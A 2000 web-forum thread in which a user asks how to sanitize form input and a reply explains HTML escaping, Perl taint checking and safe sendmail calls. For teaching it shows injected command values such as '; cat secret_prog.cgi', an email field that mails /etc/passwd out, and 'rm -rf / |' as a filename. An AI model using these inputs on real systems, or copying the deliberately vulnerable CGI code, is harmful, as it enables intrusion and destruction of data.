security holes
i need some very basic information. which kind of user-input must be washed from any dangerous 'things'? and how to do that?
i have a mailform, a guestbook-script and a postcard-function on one of my sites, now i was wondering about the risk i'm taking with them... in which situation can user-input be risky?
japhy posted this at 14:01 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
You have several options when accepting text from a form for displaying on an HTML page.
[=1]
[*] escape potentially unsafe characters -- change < to < and > to > and & to &, and you'll be safe
[/=1]
While it would be very cool of you to incorporate a working HTML parser in your guestbook or message board, etc., so that people can use (a select subset of) tags normally, it's probably far easier to use a combination of 3 and 4.
That's what I see practically all forums doing nowadays. My only qualm is that I don't see the forums telling me the precise usage of brackets -- where can I have whitespace? Do I need to escape brackets that aren't to be interpreted as tags? Etc. With HTML parsing, you can be very explicit with instructions: "you are allowed to enter tags normally, but only , , and tags will be recognized".
Ok, that's my spiel.[/]
merlin posted this at 14:31 — 13th December 2000.
They have: 410 posts
Joined: Oct 1999
great!
how do i include such a parser and how do i use it? i think i'll consult my perlbooks...
that sounds great! i'd say this is an 'easy' regexp s/
[/]
japhy posted this at 14:43 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
Another place to take caution is when you use user input in a system command. Take this VERY SIMPLE (and very insecure) CGI program:
#!/usr/bin/perl
use CGI 'param';
my $function = param('perlfunc');
print "Content-type: text/plain\n\n";
print `perldoc -f $function`;
This code is supposed to get the name of a Perl function from a form (the text element is called 'perlfunc'), and then display the information about that function in the 'perlfunc' document. Who can find the security hole?
What if I enter "; ls -lag" as my "perl function"? Now, my program blindly runs perldoc -f; ls -lag, and the user sees the contents of the current directory. Hmm, and since all Perl CGI programs have to be readable by the 'nobody' user, that means that I can see the NAMES of the other CGI programs.
Then I can just send the program "; cat secret_prog.cgi" and now I've seen the contents of THAT program -- I sure hope you don't use plaintext passwords, or you're ruined.
The solution is to use Perl's taint checking. This is available with the -T switch to perl. Taint checking requires you validate input from outside of your program -- this is usually done with a rigorous regex to ensure the right stuff:
#!/usr/bin/perl -T
use CGI 'param';
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
# notice the ()'s around $func -- this is important
# a regex in LIST CONTEXT returns parenthesized sub-patterns
# so $func gets set to the valid portion of the string, if any
print "Content-type: text/plain\n\n";
print `perldoc -f $func`;
That program should run... right? Sorry. Perl thinks the environment is unsafe, and requests that you make it safe, too -- specifically, $ENV{PATH}. This is so that YOU run the 'perldoc' program you THINK you're running.
#!/usr/bin/perl -wT
use CGI 'param';
use strict;
# we should always use -w and 'strict' and -T for CGI programs
$ENV{PATH} = "/bin:/usr/bin:/usr/local/bin";
my ($func) = param('perlfunc') =~ /(-[a-zA-Z]|[a-zA-Z]+)/;
print "Content-type: text/plain\n\n";
print `perldoc -f $func`;
That runs fine. And, for even more safety, you might want to change that last line to have the full path to 'perldoc', just in case you're paranoid (which you should be).
This is a simplistic example -- the big error I often see is people calling a mail program with the user's email address ON THE COMMAND-LINE. This is just a hole waiting to be exploited:
open MAIL, "| /usr/bin/sendmail $email";
Ouch. I don't think anyone REALLY has an email address of "[email protected]; mail [email protected] < /etc/passwd", but someone SURE could enter that. You're probably best off not trying to validate an email address yourself, but rather, tell sendmail (or whatever client you use) to look in the headers of the message for the To: field:
open MAIL, "| /usr/bin/sendmail -t" or die "can't run sendmail: $!";
That's all for now (again).
Be sure to read the perlsec documentation, which covers tainting in more detail.
japhy posted this at 15:02 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
The simplest mechanism is to set up a translation table:
my %HTML = (
'<' => 'lt',
'>' => 'gt',
'&' => 'amp',
);
Then create a regex based on the keys:
$REx = "[" . join("", keys %HTML) . "]"; # [<>&]
And then use it:
$user_content =~ s/($REx)/&$HTML{$1};/g;
(Notice how I saved the & and ; for the very end, there, instead of putting them in EVERY SINGLE value in the hash.)
There's a module for this already, HTML::Entities, which does even more -- it fixes accented characters and such. It's quite useful and comprehensive.
As far as HTML parsers go, you're not likely to find much about them in your books. I've not used HTML::Parser, but I can tell you how to use my YAPE::HTML module. Once you get the module from http://www.pobox.com/~japhy/YAPE/HTML.pm then you can try this program. This program will spit out the HTML content, and remove ALL TAGS except for , , and .
This can be run as a CGI program OR as a command-line program. This reads a sample HTML file from beneath the __DATA__ marker in the file.
#!/usr/bin/perl -w
use YAPE::HTML;
use strict;
print "Content-type: text/html\n\n" if $ENV{REMOTE_HOST};
my $content;
{ local $/; $content = <DATA>; }
my $parser = YAPE::HTML->new($content);
my %ok = map +($_, 1), qw( a b i );
while (my $chunk = $parser->next) {
next if
$chunk->type eq 'comment' or
$chunk->type eq 'tag' and not $ok{$chunk->tag} or
$chunk->type eq 'closetag' and not $ok{$chunk->tag};
print $chunk->string;
}
__DATA__
This is such a <b>cool</b> site.
<hr>
I hope all this markup gets <i>through</i> ok...
<br><br>
<h2 align="center">Hooray for <a href="http://www.perl.com/">Perl</a>!</h2>
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site
This code, when run, will produce:
This is such a <b>cool</b> site.
I hope all this markup gets <i>through</i> ok...
Hooray for <a href="http://www.perl.com/">Perl</a>!
<a href="http://www.pobox.com/~japhy/">Jeff's</a> web site
As you can see, it handles nested elements fine (even if a good element is in a bad element, or vice-versa).
I apologize for the UTTER lack of documentation in the module, but I assure you it will look much better once it is officially released. In the meantime, I offer any and all user support needed. I hope the sample code above is pretty self-explanatory, though.
merlin posted this at 15:27 — 13th December 2000.
They have: 410 posts
Joined: Oct 1999
ou well, i see there's a long way to go... thank you for your help! it'll take some time to learn all the stuff... but another short question for my understanding: it doesn't matter, where (cgi-bin-dir or htdocs-dir) the data is stored? it remains always a security-risk?
japhy posted this at 15:44 — 13th December 2000.
They have: 161 posts
Joined: Dec 1999
It is far safer to store your data in a directory NOT accessible from the web. That will make it impossible to be reached from the web UNLESS you provide a person a gateway to get the content, like:
open FILE, $some_path_the_user_enters;
That line is unsafe in and of itself. I could enter "/etc/passwd", or "rm -rf / |", or something else bad. The point is that you should not trust the end user, and should make sure that you are ok with what they give you. Paranoia helps in this case.
Mark Hensler posted this at 03:01 — 14th December 2000.
He has: 4,048 posts
Joined: Aug 2000
um...
Aren't you also suppose to escape $ and @ and %?
if you get user input containing:
"blah $ENV{PATH} blah"
won't it print "blah ", then whatever $ENV{PATH} is, then " blah"?
and same for @arrays and %hases?
Mark Hensler
If there is no answer on Google, then there is no question.
japhy posted this at 03:19 — 14th December 2000.
They have: 161 posts
Joined: Dec 1999
Perl does interpolation only on things in your code. If you run the following Perl program:
#!/usr/bin/perl
$X = 100;
print $ARGV[0];
and run it as perl my_program 'this is $X', you'll get the actual string this is $X, you won't get this is 100.
If that worked, templates would be simple. But Perl would also be terribly insecure.
Want to join the discussion? Create an account or log in if you already have one. Joining is fast, free and painless! We’ll even whisk you back here when you’ve finished.